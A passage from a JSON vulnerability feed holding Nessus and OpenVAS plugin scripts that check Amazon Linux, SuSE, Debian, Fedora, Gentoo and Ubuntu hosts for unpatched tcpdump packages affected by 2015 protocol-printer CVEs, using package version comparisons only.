audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"tcpdump-4.0.0-3.20090921gitdf3cb4.2.10.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tcpdump-debuginfo-4.0.0-3.20090921gitdf3cb4.2.10.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tcpdump / tcpdump-debuginfo\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:21:15", "bulletinFamily": "scanner", "description": "When running tcpdump, a remote unauthenticated user could have crashed\nthe application or, potentially, execute arbitrary code by injecting\ncrafted packages into the network.\n\nThe following vulnerabilities in protocol printers have been fixed :\n\n - IPv6 mobility printer remote DoS. (CVE-2015-0261,\n bnc#922220)\n\n - Ethernet printer remote DoS. (CVE-2015-2154, bnc#922222)\n\n - PPP printer remote DoS (CVE-2014-9140, bnc#923142)", "modified": "2015-04-09T00:00:00", "published": "2015-04-09T00:00:00", "id": "SUSE_11_TCPDUMP-150320.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=82658", "title": "SuSE 11.3 Security Update : tcpdump (SAT Patch Number 10509)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82658);\n script_version(\"$Revision: 1.1 $\");\n script_cvs_date(\"$Date: 2015/04/09 13:37:53 $\");\n\n script_cve_id(\"CVE-2014-9140\", \"CVE-2015-0261\", \"CVE-2015-2154\");\n\n script_name(english:\"SuSE 11.3 Security Update : tcpdump (SAT Patch Number 10509)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"When running tcpdump, a remote unauthenticated user could have crashed\nthe application or, potentially, execute arbitrary code by injecting\ncrafted packages into the network.\n\nThe following vulnerabilities in protocol printers have been fixed :\n\n - IPv6 mobility printer remote DoS. (CVE-2015-0261,\n bnc#922220)\n\n - Ethernet printer remote DoS. (CVE-2015-2154, bnc#922222)\n\n - PPP printer remote DoS (CVE-2014-9140, bnc#923142)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=922220\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=922222\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=923142\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-9140.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-0261.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-2154.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 10509.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:tcpdump\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 3) audit(AUDIT_OS_NOT, \"SuSE 11.3\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"tcpdump-3.9.8-1.27.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"tcpdump-3.9.8-1.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"tcpdump-3.9.8-1.27.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:21:07", "bulletinFamily": "scanner", "description": "Several issues have been discovered with tcpdump in the way it handled\nsome printer protocols. Those issues can lead to denial of service,\nor, potentially, execution of arbitrary code.\n\nCVE-2015-0261\n\nMissing bounds checks in IPv6 Mobility printer\n\nCVE-2015-2154\n\nMissing bounds checks in ISOCLNS printer\n\nCVE-2015-2155\n\nMissing bounds checks in ForCES printer\n\nThanks to Romain Françoise who prepared this update.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "modified": "2018-07-06T00:00:00", "published": "2015-03-26T00:00:00", "id": "DEBIAN_DLA-174.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=82159", "title": "Debian DLA-174-1 : tcpdump security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-174-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82159);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/07/06 11:26:06\");\n\n script_cve_id(\"CVE-2015-0261\", \"CVE-2015-2154\", \"CVE-2015-2155\");\n script_bugtraq_id(73017, 73019, 73021);\n\n script_name(english:\"Debian DLA-174-1 : tcpdump security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several issues have been discovered with tcpdump in the way it handled\nsome printer protocols. Those issues can lead to denial of service,\nor, potentially, execution of arbitrary code.\n\nCVE-2015-0261\n\nMissing bounds checks in IPv6 Mobility printer\n\nCVE-2015-2154\n\nMissing bounds checks in ISOCLNS printer\n\nCVE-2015-2155\n\nMissing bounds checks in ForCES printer\n\nThanks to Romain Françoise who prepared this update.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2015/03/msg00011.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze-lts/tcpdump\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected tcpdump package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tcpdump\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"tcpdump\", reference:\"tcpdump_4.1.1-1+deb6u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2018-09-01T23:52:56", "bulletinFamily": "scanner", "description": "Check the version of tcpdump", "modified": "2017-07-10T00:00:00", "published": "2015-07-07T00:00:00", "id": "OPENVAS:1361412562310869600", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869600", "title": "Fedora Update for tcpdump FEDORA-2015-4804", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for tcpdump FEDORA-2015-4804\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869600\");\n script_version(\"$Revision: 6630 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:34:32 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2015-07-07 06:26:25 +0200 (Tue, 07 Jul 2015)\");\n script_cve_id(\"CVE-2015-0261\", \"CVE-2015-2154\", \"CVE-2015-2153\", \"CVE-2015-2155\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for tcpdump FEDORA-2015-4804\");\n script_tag(name: \"summary\", value: \"Check the version of tcpdump\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help\nof detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"Tcpdump is a command-line tool for monitoring network traffic.\nTcpdump can capture and display the packet headers on a particular\nnetwork interface or on all interfaces. Tcpdump can display all of\nthe packet headers, or just the ones that match particular criteria.\n\nInstall tcpdump if you need a program to monitor network traffic.\n\");\n script_tag(name: \"affected\", value: \"tcpdump on Fedora 22\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"FEDORA\", value: \"2015-4804\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2015-March/153999.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"tcpdump\", rpm:\"tcpdump~4.7.3~1.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-29T12:39:09", "bulletinFamily": "scanner", "description": "Gentoo Linux Local Security Checks GLSA 201510-04", "modified": "2018-10-26T00:00:00", "published": "2015-11-08T00:00:00", "id": "OPENVAS:1361412562310121417", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121417", "title": "Gentoo Security Advisory GLSA 201510-04", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201510-04.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121417\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-11-08 13:04:38 +0200 (Sun, 08 Nov 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201510-04\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in tcpdump. Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201510-04\");\n script_cve_id(\"CVE-2015-0261\", \"CVE-2015-2153\", \"CVE-2015-2154\", \"CVE-2015-2155\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201510-04\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"net-analyzer/tcpdump\", unaffected: make_list(\"ge 4.7.4\"), vulnerable: make_list(\"lt 4.7.4\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:53:34", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been\ndiscovered in tcpdump, a command-line network traffic analyzer. These\nvulnerabilities might result in denial of service (application crash) or,\npotentially, execution of arbitrary code.", "modified": "2017-07-07T00:00:00", "published": "2015-03-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=703193", "id": "OPENVAS:703193", "title": "Debian Security Advisory DSA 3193-1 (tcpdump - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3193.nasl 6609 2017-07-07 12:05:59Z cfischer $\n# Auto-generated from advisory DSA 3193-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703193);\n script_version(\"$Revision: 6609 $\");\n script_cve_id(\"CVE-2015-0261\", \"CVE-2015-2153\", \"CVE-2015-2154\", \"CVE-2015-2155\");\n script_name(\"Debian Security Advisory DSA 3193-1 (tcpdump - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:59 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2015-03-17 00:00:00 +0100 (Tue, 17 Mar 2015)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2015/dsa-3193.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"tcpdump on Debian Linux\");\n script_tag(name: \"insight\", value: \"This program allows you to dump the\ntraffic on a network. tcpdump is able to examine IPv4, ICMPv4, IPv6, ICMPv6,\nUDP, TCP, SNMP, AFS BGP, RIP, PIM, DVMRP, IGMP, SMB, OSPF, NFS and many other\npacket types.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (wheezy),\nthese problems have been fixed in version 4.3.0-1+deb7u2.\n\nFor the upcoming stable distribution (jessie), these problems have been\nfixed in version 4.6.2-4.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 4.6.2-4.\n\nWe recommend that you upgrade your tcpdump packages.\");\n script_tag(name: \"summary\", value: \"Several vulnerabilities have been\ndiscovered in tcpdump, a command-line network traffic analyzer. These\nvulnerabilities might result in denial of service (application crash) or,\npotentially, execution of arbitrary code.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed\nsoftware version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"tcpdump\", ver:\"4.3.0-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:51:42", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been\ndiscovered in tcpdump, a command-line network traffic analyzer. These\nvulnerabilities might result in denial of service (application crash) or,\npotentially, execution of arbitrary code.", "modified": "2018-04-06T00:00:00", "published": "2015-03-17T00:00:00", "id": "OPENVAS:1361412562310703193", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703193", "title": "Debian Security Advisory DSA 3193-1 (tcpdump - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3193.nasl 9355 2018-04-06 07:16:07Z cfischer $\n# Auto-generated from advisory DSA 3193-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703193\");\n script_version(\"$Revision: 9355 $\");\n script_cve_id(\"CVE-2015-0261\", \"CVE-2015-2153\", \"CVE-2015-2154\", \"CVE-2015-2155\");\n script_name(\"Debian Security Advisory DSA 3193-1 (tcpdump - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2018-04-06 09:16:07 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name: \"creation_date\", value: \"2015-03-17 00:00:00 +0100 (Tue, 17 Mar 2015)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2015/dsa-3193.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"tcpdump on Debian Linux\");\n script_tag(name: \"insight\", value: \"This program allows you to dump the\ntraffic on a network. tcpdump is able to examine IPv4, ICMPv4, IPv6, ICMPv6,\nUDP, TCP, SNMP, AFS BGP, RIP, PIM, DVMRP, IGMP, SMB, OSPF, NFS and many other\npacket types.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (wheezy),\nthese problems have been fixed in version 4.3.0-1+deb7u2.\n\nFor the upcoming stable distribution (jessie), these problems have been\nfixed in version 4.6.2-4.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 4.6.2-4.\n\nWe recommend that you upgrade your tcpdump packages.\");\n script_tag(name: \"summary\", value: \"Several vulnerabilities have been\ndiscovered in tcpdump, a command-line network traffic analyzer. These\nvulnerabilities might result in denial of service (application crash) or,\npotentially, execution of arbitrary code.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed\nsoftware version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"tcpdump\", ver:\"4.3.0-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-11-19T13:01:08", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2015-04-28T00:00:00", "id": "OPENVAS:1361412562310842179", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842179", "title": "Ubuntu Update for tcpdump USN-2580-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for tcpdump USN-2580-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842179\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-04-28 05:17:00 +0200 (Tue, 28 Apr 2015)\");\n script_cve_id(\"CVE-2015-0261\", \"CVE-2015-2153\", \"CVE-2015-2154\", \"CVE-2015-2155\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for tcpdump USN-2580-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'tcpdump'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that tcpdump incorrectly\nhandled printing certain packets. A remote attacker could use this issue to cause\ntcpdump to crash, resulting in a denial of service, or possibly execute arbitrary\ncode.\n\nIn the default installation, attackers would be isolated by the tcpdump\nAppArmor profile.\");\n script_tag(name:\"affected\", value:\"tcpdump on Ubuntu 14.10,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"USN\", value:\"2580-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2580-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.10|14\\.04 LTS|12\\.04 LTS)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU14.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"tcpdump\", ver:\"4.6.2-1ubuntu1.2\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"tcpdump\", ver:\"4.5.1-2ubuntu1.2\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 